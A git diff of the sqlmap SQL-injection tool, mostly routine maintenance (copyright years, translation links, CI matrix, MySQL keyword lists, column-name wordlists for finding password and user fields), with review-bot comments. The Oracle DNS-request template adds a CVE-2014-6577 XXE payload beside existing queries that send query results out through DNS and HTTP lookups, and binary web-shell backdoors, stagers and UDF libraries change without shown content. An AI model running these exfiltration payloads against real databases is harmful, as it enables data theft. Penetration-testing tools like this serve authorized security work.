diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md
index b7753a2553d..0a2d0fe4aea 100644
--- a/.github/ISSUE_TEMPLATE/bug_report.md
+++ b/.github/ISSUE_TEMPLATE/bug_report.md
@@ -21,10 +21,10 @@ A clear and concise description of what you expected to happen.
If applicable, add screenshots to help explain your problem.
**Running environment:**
- - sqlmap version [e.g. 1.3.5.93#dev]
- - Installation method [e.g. git]
- - Operating system: [e.g. Microsoft Windows 10]
- - Python version [e.g. 3.5.2]
+ - sqlmap version [e.g. 1.7.2.12#dev]
+ - Installation method [e.g. pip]
+ - Operating system: [e.g. Microsoft Windows 11]
+ - Python version [e.g. 3.11.2]
**Target details:**
- DBMS [e.g. Microsoft SQL Server]
diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml
index 674ae2a004e..40f0bdac166 100644
--- a/.github/workflows/tests.yml
+++ b/.github/workflows/tests.yml
@@ -10,7 +10,7 @@ jobs:
strategy:
matrix:
os: [ubuntu-latest, macos-latest, windows-latest]
- python-version: [ '2.x', '3.11', 'pypy-2.7', 'pypy-3.7' ]
+ python-version: [ '3.11', 'pypy-2.7', 'pypy-3.7' ]
steps:
- uses: actions/checkout@v2
- name: Set up Python
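Review bot: With '2.x' removed from `python-version`, the matrix runs CPython only on '3.11', so Python 2 compatibility is checked on 'pypy-2.7' alone and older CPython 3 releases are not run at all. If CPython 2.7 and earlier 3.x are still supported runtimes, record that next to the matrix, e.g. `# CPython 2.x no longer in CI; 2.7 compatibility is covered by pypy-2.7 only`, or add a second CPython 3 entry. Separately, the unchanged `actions/checkout@v2` context line references a mutable tag. Pinning actions to a full commit SHA is the usual supply-chain hardening for a workflow like this. The job definition continues outside the hunk.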
diff --git a/LICENSE b/LICENSE
index 172de6054cb..894e0ec623c 100644
--- a/LICENSE
+++ b/LICENSE
@@ -1,7 +1,7 @@
COPYING -- Describes the terms under which sqlmap is distributed. A copy
of the GNU General Public License (GPL) is appended to this file.
-sqlmap is (C) 2006-2023 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
+sqlmap is (C) 2006-2024 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
This program is free software; you may redistribute and/or modify it under
the terms of the GNU General Public License as published by the Free
diff --git a/README.md b/README.md
index 3ac67dbca9b..772c3d08738 100644
--- a/README.md
+++ b/README.md
@@ -58,8 +58,9 @@ Translations
* [Dutch](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-nl-NL.md)
* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)
* [Georgian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ka-GE.md)
-* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-GER.md)
+* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-DE.md)
* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
+* [Hindi](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-in-HI.md)
* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
@@ -67,8 +68,9 @@ Translations
* [Persian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fa-IR.md)
* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
-* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md)
+* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RU.md)
* [Serbian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-rs-RS.md)
+* [Slovak](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-sk-SK.md)
* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
* [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md)
diff --git a/data/procs/oracle/dns_request.sql b/data/procs/oracle/dns_request.sql
index adb71cfb2fb..5dda762c08d 100644
--- a/data/procs/oracle/dns_request.sql
+++ b/data/procs/oracle/dns_request.sql
@@ -1,2 +1,3 @@
SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
+# or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual
diff --git a/data/shell/backdoors/backdoor.asp_ b/data/shell/backdoors/backdoor.asp_
index 5a81545e020..bc912038c7d 100644
Binary files a/data/shell/backdoors/backdoor.asp_ and b/data/shell/backdoors/backdoor.asp_ differ
diff --git a/data/shell/backdoors/backdoor.aspx_ b/data/shell/backdoors/backdoor.aspx_
index 8e83a0d2009..de889b1ed7a 100644
Binary files a/data/shell/backdoors/backdoor.aspx_ and b/data/shell/backdoors/backdoor.aspx_ differ
diff --git a/data/shell/backdoors/backdoor.jsp_ b/data/shell/backdoors/backdoor.jsp_
index 8d01202f00f..f798ea5778c 100644
Binary files a/data/shell/backdoors/backdoor.jsp_ and b/data/shell/backdoors/backdoor.jsp_ differ
diff --git a/data/shell/backdoors/backdoor.php_ b/data/shell/backdoors/backdoor.php_
index 5db8f130f9b..720bfe1fff4 100644
Binary files a/data/shell/backdoors/backdoor.php_ and b/data/shell/backdoors/backdoor.php_ differ
diff --git a/data/shell/stagers/stager.asp_ b/data/shell/stagers/stager.asp_
index 5c235ecb5f4..bd08896ad19 100644
Binary files a/data/shell/stagers/stager.asp_ and b/data/shell/stagers/stager.asp_ differ
diff --git a/data/shell/stagers/stager.aspx_ b/data/shell/stagers/stager.aspx_
index f20887a96d6..3694b2c1533 100644
Binary files a/data/shell/stagers/stager.aspx_ and b/data/shell/stagers/stager.aspx_ differ
diff --git a/data/shell/stagers/stager.jsp_ b/data/shell/stagers/stager.jsp_
index beec2ae56ae..f70ac6f9efd 100644
Binary files a/data/shell/stagers/stager.jsp_ and b/data/shell/stagers/stager.jsp_ differ
diff --git a/data/shell/stagers/stager.php_ b/data/shell/stagers/stager.php_
index eafe6277127..c5103161a7d 100644
Binary files a/data/shell/stagers/stager.php_ and b/data/shell/stagers/stager.php_ differ
diff --git a/data/txt/common-columns.txt b/data/txt/common-columns.txt
index b2e00b3456d..a4cd79e75e6 100644
--- a/data/txt/common-columns.txt
+++ b/data/txt/common-columns.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
id
@@ -1844,6 +1844,10 @@ banner_id
error
language_id
val
+parol
+familiya
+imya
+otchestvo
# site:jp
@@ -2731,6 +2735,34 @@ ssn
account
confidential
+# site:nl
+
+naam
+straat
+gemeente
+beschrijving
+id_gebruiker
+gebruiker_id
+gebruikersnaam
+wachtwoord
+telefoon
+voornaam
+achternaam
+geslacht
+huisnummer
+gemeente
+leeftijd
+
+# site:cn
+
+yonghuming
+mima
+xingming
+xingbie
+touxiang
+youxiang
+shouji
+
# Misc
u_pass
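Review bot: The new `# site:nl` block lists `gemeente` twice, once after `straat` and again after `huisnummer`. The second occurrence adds nothing and should be dropped. If the loader that reads this wordlist does not deduplicate, the repeat also costs one redundant lookup per run. It is worth checking the other added entries against the rest of the file for the same reason, since the hunk shows only a small window of it.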
diff --git a/data/txt/common-files.txt b/data/txt/common-files.txt
index 8fbbe0ebd7b..52d3368a538 100644
--- a/data/txt/common-files.txt
+++ b/data/txt/common-files.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# CTFs
diff --git a/data/txt/common-outputs.txt b/data/txt/common-outputs.txt
index 60bdf5edb26..15651da4e44 100644
--- a/data/txt/common-outputs.txt
+++ b/data/txt/common-outputs.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
[Banners]
@@ -399,6 +399,7 @@ XDBWEBSERVICES
# MySQL
information_schema
+performance_schema
mysql
phpmyadmin
diff --git a/data/txt/common-tables.txt b/data/txt/common-tables.txt
index 8776e2e8864..f1db0644ca5 100644
--- a/data/txt/common-tables.txt
+++ b/data/txt/common-tables.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
users
@@ -3578,3 +3578,11 @@ users
user_usergroup_map
viewlevels
weblinks
+
+# site:nl
+
+gebruikers
+
+# site:cn
+
+yonghu
diff --git a/data/txt/keywords.txt b/data/txt/keywords.txt
index f8c81387c07..50b4262615b 100644
--- a/data/txt/keywords.txt
+++ b/data/txt/keywords.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml)
@@ -452,6 +452,762 @@ WRITEXOR
YEAR_MONTH
ZEROFILL
+# MySQL 8.0 keywords (reference: https://dev.mysql.com/doc/refman/8.0/en/keywords.html)
+
+ACCESSIBLE
+ACCOUNT
+ACTION
+ACTIVE
+ADD
+ADMIN
+AFTER
+AGAINST
+AGGREGATE
+ALGORITHM
+ALL
+ALTER
+ALWAYS
+ANALYSE
+ANALYZE
+AND
+ANY
+ARRAY
+AS
+ASC
+ASCII
+ASENSITIVE
+AT
+ATTRIBUTE
+AUTHENTICATION
+AUTOEXTEND_SIZE
+AUTO_INCREMENT
+AVG
+AVG_ROW_LENGTH
+BACKUP
+BEFORE
+BEGIN
+BETWEEN
+BIGINT
+BINARY
+BINLOG
+BIT
+BLOB
+BLOCK
+BOOL
+BOOLEAN
+BOTH
+BTREE
+BUCKETS
+BULK
+BY
+BYTE
+CACHE
+CALL
+CASCADE
+CASCADED
+CASE
+CATALOG_NAME
+CHAIN
+CHALLENGE_RESPONSE
+CHANGE
+CHANGED
+CHANNEL
+CHAR
+CHARACTER
+CHARSET
+CHECK
+CHECKSUM
+CIPHER
+CLASS_ORIGIN
+CLIENT
+CLONE
+CLOSE
+COALESCE
+CODE
+COLLATE
+COLLATION
+COLUMN
+COLUMNS
+COLUMN_FORMAT
+COLUMN_NAME
+COMMENT
+COMMIT
+COMMITTED
+COMPACT
+COMPLETION
+COMPONENT
+COMPRESSED
+COMPRESSION
+CONCURRENT
+CONDITION
+CONNECTION
+CONSISTENT
+CONSTRAINT
+CONSTRAINT_CATALOG
+CONSTRAINT_NAME
+CONSTRAINT_SCHEMA
+CONTAINS
+CONTEXT
+CONTINUE
+CONVERT
+CPU
+CREATE
+CROSS
+CUBE
+CUME_DIST
+CURRENT
+CURRENT_DATE
+CURRENT_TIME
+CURRENT_TIMESTAMP
+CURRENT_USER
+CURSOR
+CURSOR_NAME
+DATA
+DATABASE
+DATABASES
+DATAFILE
+DATE
+DATETIME
+DAY
+DAY_HOUR
+DAY_MICROSECOND
+DAY_MINUTE
+DAY_SECOND
+DEALLOCATE
+DEC
+DECIMAL
+DECLARE
+DEFAULT
+DEFAULT_AUTH
+DEFINER
+DEFINITION
+DELAYED
+DELAY_KEY_WRITE
+DELETE
+DENSE_RANK
+DESC
+DESCRIBE
+DESCRIPTION
+DES_KEY_FILE
+DETERMINISTIC
+DIAGNOSTICS
+DIRECTORY
+DISABLE
+DISCARD
+DISK
+DISTINCT
+DISTINCTROW
+DIV
+DO
+DOUBLE
+DROP
+DUAL
+DUMPFILE
+DUPLICATE
+DYNAMIC
+EACH
+ELSE
+ELSEIF
+EMPTY
+ENABLE
+ENCLOSED
+ENCRYPTION
+END
+ENDS
+ENFORCED
+ENGINE
+ENGINES
+ENGINE_ATTRIBUTE
+ENUM
+ERROR
+ERRORS
+ESCAPE
+ESCAPED
+EVENT
+EVENTS
+EVERY
+EXCEPT
+EXCHANGE
+EXCLUDE
+EXECUTE
+EXISTS
+EXIT
+EXPANSION
+EXPIRE
+EXPLAIN
+EXPORT
+EXTENDED
+EXTENT_SIZE
+FACTOR
+FAILED_LOGIN_ATTEMPTS
+FALSE
+FAST
+FAULTS
+FETCH
+FIELDS
+FILE
+FILE_BLOCK_SIZE
+FILTER
+FINISH
+FIRST
+FIRST_VALUE
+FIXED
+FLOAT
+FLOAT4
+FLOAT8
+FLUSH
+FOLLOWING
+FOLLOWS
+FOR
+FORCE
+FOREIGN
+FORMAT
+FOUND
+FROM
+FULL
+FULLTEXT
+FUNCTION
+GENERAL
+GENERATE
+GENERATED
+GEOMCOLLECTION
+GEOMETRY
+GEOMETRYCOLLECTION
+GET
+GET_FORMAT
+GET_MASTER_PUBLIC_KEY
+GET_SOURCE_PUBLIC_KEY
+GLOBAL
+GRANT
+GRANTS
+GROUP
+GROUPING
+GROUPS
+GROUP_REPLICATION
+GTID_ONLY
+HANDLER
+HASH
+HAVING
+HELP
+HIGH_PRIORITY
+HISTOGRAM
+HISTORY
+HOST
+HOSTS
+HOUR
+HOUR_MICROSECOND
+HOUR_MINUTE
+HOUR_SECOND
+IDENTIFIED
+IF
+IGNORE
+IGNORE_SERVER_IDS
+IMPORT
+IN
+INACTIVE
+INDEX
+INDEXES
+INFILE
+INITIAL
+INITIAL_SIZE
+INITIATE
+INNER
+INOUT
+INSENSITIVE
+INSERT
+INSERT_METHOD
+INSTALL
+INSTANCE
+INT
+INT1
+INT2
+INT3
+INT4
+INT8
+INTEGER
+INTERSECT
+INTERVAL
+INTO
+INVISIBLE
+INVOKER
+IO
+IO_AFTER_GTIDS
+IO_BEFORE_GTIDS
+IO_THREAD
+IPC
+IS
+ISOLATION
+ISSUER
+ITERATE
+JOIN
+JSON
+JSON_TABLE
+JSON_VALUE
+KEY
+KEYRING
+KEYS
+KEY_BLOCK_SIZE
+KILL
+LAG
+LANGUAGE
+LAST
+LAST_VALUE
+LATERAL
+LEAD
+LEADING
+LEAVE
+LEAVES
+LEFT
+LESS
+LEVEL
+LIKE
+LIMIT
+LINEAR
+LINES
+LINESTRING
+LIST
+LOAD
+LOCAL
+LOCALTIME
+LOCALTIMESTAMP
+LOCK
+LOCKED
+LOCKS
+LOGFILE
+LOGS
+LONG
+LONGBLOB
+LONGTEXT
+LOOP
+LOW_PRIORITY
+MASTER
+MASTER_AUTO_POSITION
+MASTER_BIND
+MASTER_COMPRESSION_ALGORITHMS
+MASTER_CONNECT_RETRY
+MASTER_DELAY
+MASTER_HEARTBEAT_PERIOD
+MASTER_HOST
+MASTER_LOG_FILE
+MASTER_LOG_POS
+MASTER_PASSWORD
+MASTER_PORT
+MASTER_PUBLIC_KEY_PATH
+MASTER_RETRY_COUNT
+MASTER_SERVER_ID
+MASTER_SSL
+MASTER_SSL_CA
+MASTER_SSL_CAPATH
+MASTER_SSL_CERT
+MASTER_SSL_CIPHER
+MASTER_SSL_CRL
+MASTER_SSL_CRLPATH
+MASTER_SSL_KEY
+MASTER_SSL_VERIFY_SERVER_CERT
+MASTER_TLS_CIPHERSUITES
+MASTER_TLS_VERSION
+MASTER_USER
+MASTER_ZSTD_COMPRESSION_LEVEL
+MATCH
+MAXVALUE
+MAX_CONNECTIONS_PER_HOUR
+MAX_QUERIES_PER_HOUR
+MAX_ROWS
+MAX_SIZE
+MAX_UPDATES_PER_HOUR
+MAX_USER_CONNECTIONS
+MEDIUM
+MEDIUMBLOB
+MEDIUMINT
+MEDIUMTEXT
+MEMBER
+MEMORY
+MERGE
+MESSAGE_TEXT
+MICROSECOND
+MIDDLEINT
+MIGRATE
+MINUTE
+MINUTE_MICROSECOND
+MINUTE_SECOND
+MIN_ROWS
+MOD
+MODE
+MODIFIES
+MODIFY
+MONTH
+MULTILINESTRING
+MULTIPOINT
+MULTIPOLYGON
+MUTEX
+MYSQL_ERRNO
+NAME
+NAMES
+NATIONAL
+NATURAL
+NCHAR
+NDB
+NDBCLUSTER
+NESTED
+NETWORK_NAMESPACE
+NEVER
+NEW
+NEXT
+NO
+NODEGROUP
+NONE
+NOT
+NOWAIT
+NO_WAIT
+NO_WRITE_TO_BINLOG
+NTH_VALUE
+NTILE
+NULL
+NULLS
+NUMBER
+NUMERIC
+NVARCHAR
+OF
+OFF
+OFFSET
+OJ
+OLD
+ON
+ONE
+ONLY
+OPEN
+OPTIMIZE
+OPTIMIZER_COSTS
+OPTION
+OPTIONAL
+OPTIONALLY
+OPTIONS
+OR
+ORDER
+ORDINALITY
+ORGANIZATION
+OTHERS
+OUT
+OUTER
+OUTFILE
+OVER
+OWNER
+PACK_KEYS
+PAGE
+PARSER
+PARTIAL
+PARTITION
+PARTITIONING
+PARTITIONS
+PASSWORD_LOCK_TIME
+PATH
+PERCENT_RANK
+PERSIST
+PERSIST_ONLY
+PHASE
+PLUGIN
+PLUGINS
+PLUGIN_DIR
+POINT
+POLYGON
+PORT
+PRECEDES
+PRECEDING
+PRECISION
+PREPARE
+PRESERVE
+PREV
+PRIMARY
+PRIVILEGES
+PRIVILEGE_CHECKS_USER
+PROCEDURE
+PROCESS
+PROCESSLIST
+PROFILE
+PROFILES
+PROXY
+PURGE
+QUARTER
+QUERY
+QUICK
+RANDOM
+RANGE
+RANK
+READ
+READS
+READ_ONLY
+READ_WRITE
+REAL
+REBUILD
+RECOVER
+RECURSIVE
+REDOFILE
+REDO_BUFFER_SIZE
+REDUNDANT
+REFERENCE
+REFERENCES
+REGEXP
+REGISTRATION
+RELAY
+RELAYLOG
+RELAY_LOG_FILE
+RELAY_LOG_POS
+RELAY_THREAD
+RELEASE
+RELOAD
+REMOTE
+REMOVE
+RENAME
+REORGANIZE
+REPAIR
+REPEAT
+REPEATABLE
+REPLACE
+REPLICA
+REPLICAS
+REPLICATE_DO_DB
+REPLICATE_DO_TABLE
+REPLICATE_IGNORE_DB
+REPLICATE_IGNORE_TABLE
+REPLICATE_REWRITE_DB
+REPLICATE_WILD_DO_TABLE
+REPLICATE_WILD_IGNORE_TABLE
+REPLICATION
+REQUIRE
+REQUIRE_ROW_FORMAT
+RESET
+RESIGNAL
+RESOURCE
+RESPECT
+RESTART
+RESTORE
+RESTRICT
+RESUME
+RETAIN
+RETURN
+RETURNED_SQLSTATE
+RETURNING
+RETURNS
+REUSE
+REVERSE
+REVOKE
+RIGHT
+RLIKE
+ROLE
+ROLLBACK
+ROLLUP
+ROTATE
+ROUTINE
+ROW
+ROWS
+ROW_COUNT
+ROW_FORMAT
+ROW_NUMBER
+RTREE
+SAVEPOINT
+SCHEDULE
+SCHEMA
+SCHEMAS
+SCHEMA_NAME
+SECOND
+SECONDARY
+SECONDARY_ENGINE
+SECONDARY_ENGINE_ATTRIBUTE
+SECONDARY_LOAD
+SECONDARY_UNLOAD
+SECOND_MICROSECOND
+SECURITY
+SELECT
+SENSITIVE
+SEPARATOR
+SERIAL
+SERIALIZABLE
+SERVER
+SESSION
+SET
+SHARE
+SHOW
+SHUTDOWN
+SIGNAL
+SIGNED
+SIMPLE
+SKIP
+SLAVE
+SLOW
+SMALLINT
+SNAPSHOT
+SOCKET
+SOME
+SONAME
+SOUNDS
+SOURCE
+SOURCE_AUTO_POSITION
+SOURCE_BIND
+SOURCE_COMPRESSION_ALGORITHMS
+SOURCE_CONNECT_RETRY
+SOURCE_DELAY
+SOURCE_HEARTBEAT_PERIOD
+SOURCE_HOST
+SOURCE_LOG_FILE
+SOURCE_LOG_POS
+SOURCE_PASSWORD
+SOURCE_PORT
+SOURCE_PUBLIC_KEY_PATH
+SOURCE_RETRY_COUNT
+SOURCE_SSL
+SOURCE_SSL_CA
+SOURCE_SSL_CAPATH
+SOURCE_SSL_CERT
+SOURCE_SSL_CIPHER
+SOURCE_SSL_CRL
+SOURCE_SSL_CRLPATH
+SOURCE_SSL_KEY
+SOURCE_SSL_VERIFY_SERVER_CERT
+SOURCE_TLS_CIPHERSUITES
+SOURCE_TLS_VERSION
+SOURCE_USER
+SOURCE_ZSTD_COMPRESSION_LEVEL
+SPATIAL
+SPECIFIC
+SQL
+SQLEXCEPTION
+SQLSTATE
+SQLWARNING
+SQL_AFTER_GTIDS
+SQL_AFTER_MTS_GAPS
+SQL_BEFORE_GTIDS
+SQL_BIG_RESULT
+SQL_BUFFER_RESULT
+SQL_CACHE
+SQL_CALC_FOUND_ROWS
+SQL_NO_CACHE
+SQL_SMALL_RESULT
+SQL_THREAD
+SQL_TSI_DAY
+SQL_TSI_HOUR
+SQL_TSI_MINUTE
+SQL_TSI_MONTH
+SQL_TSI_QUARTER
+SQL_TSI_SECOND
+SQL_TSI_WEEK
+SQL_TSI_YEAR
+SRID
+SSL
+STACKED
+START
+STARTING
+STARTS
+STATS_AUTO_RECALC
+STATS_PERSISTENT
+STATS_SAMPLE_PAGES
+STATUS
+STOP
+STORAGE
+STORED
+STRAIGHT_JOIN
+STREAM
+STRING
+SUBCLASS_ORIGIN
+SUBJECT
+SUBPARTITION
+SUBPARTITIONS
+SUPER
+SUSPEND
+SWAPS
+SWITCHES
+SYSTEM
+TABLE
+TABLES
+TABLESPACE
+TABLE_CHECKSUM
+TABLE_NAME
+TEMPORARY
+TEMPTABLE
+TERMINATED
+TEXT
+THAN
+THEN
+THREAD_PRIORITY
+TIES
+TIME
+TIMESTAMP
+TIMESTAMPADD
+TIMESTAMPDIFF
+TINYBLOB
+TINYINT
+TINYTEXT
+TLS
+TO
+TRAILING
+TRANSACTION
+TRIGGER
+TRIGGERS
+TRUE
+TRUNCATE
+TYPE
+TYPES
+UNBOUNDED
+UNCOMMITTED
+UNDEFINED
+UNDO
+UNDOFILE
+UNDO_BUFFER_SIZE
+UNICODE
+UNINSTALL
+UNION
+UNIQUE
+UNKNOWN
+UNLOCK
+UNREGISTER
+UNSIGNED
+UNTIL
+UPDATE
+UPGRADE
+URL
+USAGE
+USE
+USER
+USER_RESOURCES
+USE_FRM
+USING
+UTC_DATE
+UTC_TIME
+UTC_TIMESTAMP
+VALIDATION
+VALUE
+VALUES
+VARBINARY
+VARCHAR
+VARCHARACTER
+VARIABLES
+VARYING
+VCPU
+VIEW
+VIRTUAL
+VISIBLE
+WAIT
+WARNINGS
+WEEK
+WEIGHT_STRING
+WHEN
+WHERE
+WHILE
+WINDOW
+WITH
+WITHOUT
+WORK
+WRAPPER
+WRITE
+X509
+XA
+XID
+XML
+XOR
+YEAR
+YEAR_MONTH
+ZEROFILL
+ZONE
+
# PostgreSQL|SQL:2016|SQL:2011 reserved words (reference: https://www.postgresql.org/docs/current/sql-keywords-appendix.html)
ABS
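Review bot: The added MySQL 8.0 section repeats keywords the file already contains: `YEAR_MONTH` and `ZEROFILL` appear as context lines directly above the new header and again at the end of the new block. Common words such as `SELECT`, `FROM` and `WHERE` are presumably already in the SQL-92 section named in the file header. If the consumer loads this file into a set the duplicates are harmless, but that is not visible here. A short comment under the new header would make the intent explicit, e.g. `# full list kept verbatim from the reference; overlaps with earlier sections are expected`, or the block could be reduced to the entries not already present.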
@@ -872,3 +1628,8 @@ XMLTABLE
XMLTEXT
XMLVALIDATE
YEAR
+
+# Misc
+
+ORD
+MID
diff --git a/data/txt/user-agents.txt b/data/txt/user-agents.txt
index 02f52001940..a92582d3995 100644
--- a/data/txt/user-agents.txt
+++ b/data/txt/user-agents.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Opera
diff --git a/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ b/data/udf/mysql/linux/32/lib_mysqludf_sys.so_
index f401c800406..bfd4440ba5f 100644
Binary files a/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ and b/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ differ
diff --git a/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ b/data/udf/mysql/linux/64/lib_mysqludf_sys.so_
index f442d1f14de..1992ed0347e 100644
Binary files a/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ and b/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ differ
diff --git a/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ b/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
index 17814b6ba53..bb8ec366d4c 100644
Binary files a/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ and b/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ differ
diff --git a/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ b/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
index 33a7adbe0c5..97799b69d4d 100644
Binary files a/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ and b/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ differ
diff --git a/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_
index f7e6da36499..33dbdeeb35b 100644
Binary files a/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_
index 3b030e70b1f..c56d766209a 100644
Binary files a/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
index 7c72515a892..3fb236e2644 100644
Binary files a/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
index 43f7cdc55d9..d734fff00ae 100644
Binary files a/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
index 2c49149d0d5..da50fa8eafc 100644
Binary files a/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
index f463ee7543d..83732d33298 100644
Binary files a/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
index 147039a2542..ee1ca8ccef1 100644
Binary files a/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
index cf56372ea9a..ab7e7456223 100644
Binary files a/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
index 8ec4566eb7b..5314a0a3886 100644
Binary files a/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
index 310f838de53..da9d0a7f6f7 100644
Binary files a/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_
index 504be8277e3..1100ab820fd 100644
Binary files a/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_
index 2e19b356e14..f9396a86aa5 100644
